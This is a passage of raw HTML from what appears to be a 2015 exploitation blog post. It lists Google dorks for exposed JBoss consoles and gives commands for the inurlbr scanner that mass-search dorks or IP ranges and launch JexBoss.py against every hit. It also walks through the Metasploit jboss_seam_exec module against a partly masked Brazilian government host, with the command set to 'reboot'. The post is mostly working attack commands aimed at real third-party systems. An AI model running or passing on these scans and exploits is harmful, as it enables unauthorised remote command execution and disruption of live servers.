<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- search using dorks file </span></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- File example with dorks:</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:br inurl:"jmx-console/HtmlAdaptor"</span><br /><span style="line-height: 25.6000003814697px;">site:uk inurl:"jmx-console/HtmlAdaptor"</span></span></div>
<div>
<span style="line-height: 25.6000003814697px;"><span style="font-family: "courier new" , "courier" , monospace;">site:in inurl:"jmx-console/HtmlAdaptor"</span></span></div>
<div>
<span style="line-height: 25.6000003814697px;"><span style="font-family: "courier new" , "courier" , monospace;">site:ru inurl:"jmx-console/HtmlAdaptor"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:pe inurl:"jmx-console/HtmlAdaptor"</span><span style="line-height: 25.6000003814697px;"><br /></span><span style="line-height: 25.6000003814697px;">site:br </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:uk </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:ru </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:us </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">site:com </span><span style="line-height: 25.6000003814697px;">inurl:"</span><span style="line-height: 25.6000003814697px;">/web-console/Invoker</span><span style="line-height: 25.6000003814697px;">"</span></span></div>
<div>
<span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;">So on .....<br /><br /><i>Exemple-> File: dorks.txt</i></span></span><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;"><b>--dork-file {YOU_DORKFILE}</b></i><span style="font-family: "helvetica neue" , "helvetica" , "segoe ui" , "arial" , "freesans" , sans-serif;"><span style="line-height: 25.6000003814697px;"><i><br /></i></span></span></div>
<div>
<span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all --unique --command-all "python JexBoss</span><span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">.py _TARGET_"</span></span><br />
<br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- Using to capture the range of ips</span><b><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;">--</i><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">range</span><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;"> {</i><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;">IP</i><i style="color: red; font-family: 'Courier New', Courier, monospace; line-height: 25.6000003814697px;">_START,IP_END}</i></b><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all --unique --command-all "python JexBoss.py _TARGET_"</span></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">- Range of ips </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">random</span><b><i><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">--</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">range-rand</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;"> {</span><span style="color: red; font-family: "courier new" , "courier" , monospace;"><span style="line-height: 25.6000003814697px;">counter}</span></span></i></b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">php inurlbr.php --range-rand '150'</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;"> -s output.txt -q all --unique --command-all "python JexBoss</span><span style="color: red; font-family: "courier new" , "courier" , monospace; line-height: 25.6000003814697px;">.py _TARGET_"</span><br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">Exemple OUTPUT:</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaqTYxCnkg4di-kmPYCmGlQpt1MDesxOsaew6CfLsaPr__nqvCkdN67TFCDB5dhPdKdVwDdKVpPMxa5UlzpztpWzxCOIZF9k8ybLY5Ub9dYLfVCphKp3807oC4ZRvcRcMbzOERIE0Ahjea/s1600/Captura+de+tela+de+2015-06-19+16%253A36%253A42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaqTYxCnkg4di-kmPYCmGlQpt1MDesxOsaew6CfLsaPr__nqvCkdN67TFCDB5dhPdKdVwDdKVpPMxa5UlzpztpWzxCOIZF9k8ybLY5Ub9dYLfVCphKp3807oC4ZRvcRcMbzOERIE0Ahjea/s640/Captura+de+tela+de+2015-06-19+16%253A36%253A42.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com1tag:blogger.com,1999:blog-5670232360751087799.post-18240036574768648772015-06-19T14:47:00.002-03:002015-06-19T15:56:37.456-03:00JBoss Seam 2 Remote Command Execution - Metasploit<div style="text-align: center;">
<h3>
JBoss Seam 2 Remote Command Execution - Metasploit</h3>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAwkI8w4gDgm8GJrBX94MNl7M_GDbjMBOkZz4PcaC7uQqCK2N7kYHpPoONcMIVCtG3gY50_TWfKoFb8GiqksVRVDIKq3jGuI4KzOwMFy7iseij20fdNKeEBcC2fPUNumj1jKJ-0hwj6Vw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured." border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAwkI8w4gDgm8GJrBX94MNl7M_GDbjMBOkZz4PcaC7uQqCK2N7kYHpPoONcMIVCtG3gY50_TWfKoFb8GiqksVRVDIKq3jGuI4KzOwMFy7iseij20fdNKeEBcC2fPUNumj1jKJ-0hwj6Vw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png" title="JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured." width="400" /></a></div>
<br /></div>
<div>
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.</div>
<div>
</div>
<ul>
<li><span style="font-size: large;"><b>MODULE METASPLOIT:</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">auxiliary/admin/http/jboss_seam_exec</span></li>
</ul>
<div>
</div>
<ul>
<li><span style="font-size: large;"><b>COMMAND SCANNER INURLBR:</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6</span></li>
</ul>
<div>
</div>
<ul>
<li><span style="font-size: large;"><b>DORK:</b></span><span style="color: red; font-family: Courier New, Courier, monospace;">site:.gov.br inurl:.seam intitle:"JBoss Seam Debug"</span></li>
</ul>
<div>
<span style="font-size: large;"><b>Configuração:</b></span></div>
<ul>
<li><b>CMD - <span style="color: red;">The command to execute.</span></b></li>
<li><b>RHOST - <span style="color: red;">The target address</span></b></li>
<li><b>RPORT - <span style="color: red;">The target port</span></b></li>
<li><b>TARGETURI - <span style="color: red;">Target URI</span></b></li>
</ul>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf > use auxiliary/admin/http/jboss_seam_exec</span></div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set RHOST *******.mj.gov.br</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set RPORT 80</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set CMD reboot</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<span style="color: red;"><b>jboss_seam_exec</b></span>) > set TARGETURI /******/home.seam</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">msf auxiliary(<b><span style="color: red;">jboss_seam_exec</span></b>) > exploit<br /><br /><b>Output:</b></span></div>
<div class="separator" style="clear: both;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjtAl2DtnAlBj6WxWM7Btx5VBvOIno1VBG7csHvlHtxso3ii6mKLrIv4AuYmzpDbblxAOrYB0tbvkwTpHqT8SjXHLmi81oWHgIdDiS2Mxq_c0ijdIh0Fure_frxrS8kP8mFY-fBgf4Sw/s1600/ssss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI /******/home.seam msf auxiliary(jboss_seam_exec) > exploit" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjtAl2DtnAlBj6WxWM7Btx5VBvOIno1VBG7csHvlHtxso3ii6mKLrIv4AuYmzpDbblxAOrYB0tbvkwTpHqT8SjXHLmi81oWHgIdDiS2Mxq_c0ijdIh0Fure_frxrS8kP8mFY-fBgf4Sw/s1600/ssss.png" title="msf > use auxiliary/admin/http/jboss_seam_exec msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br msf auxiliary(jboss_seam_exec) > set RPORT 80 msf auxiliary(jboss_seam_exec) > set CMD reboot msf auxiliary(jboss_seam_exec) > set TARGETURI /******/home.seam msf auxiliary(jboss_seam_exec) > exploit" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="font-size: large;">Resultado:</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIhzelY2wME2KR-N47HcKML8MvB1E07oI3NAyNgtwep-D4-BimS4vMqeIYRs23QEWo3d4NIxjoJQOKN0oPZpHNwRMx0tr2Ng7kMZ120ZJob9GbDl0UI0tN9AaBV-MYDBQvMpMCQxpLd3U/s1600/xssss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Resultado:" border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIhzelY2wME2KR-N47HcKML8MvB1E07oI3NAyNgtwep-D4-BimS4vMqeIYRs23QEWo3d4NIxjoJQOKN0oPZpHNwRMx0tr2Ng7kMZ120ZJob9GbDl0UI0tN9AaBV-MYDBQvMpMCQxpLd3U/s1600/xssss.png" title="Resultado:" width="640" /></a></div>
<div>
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="color: #6aa84f;"><span style="font-size: large;">VÍDEO</span><span style="font-size: large;">:</span></span><b><br />
<iframe allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/DSKqhh8TD80" width="100%"></iframe>
<br /><br /><br class="Apple-interchange-newline" /><span style="color: lime;">REFERENCE</span>:</b> <a href="http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec">http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec</a><br />
<b><span style="color: lime;">SCANNER INURLBR:</span></b> <a href="http://github.com/googleinurl/SCANNER-INURLBR">http://github.com/googleinurl/SCANNER-INURLBR</a></div>
</div>Unknownnoreply@blogger.com0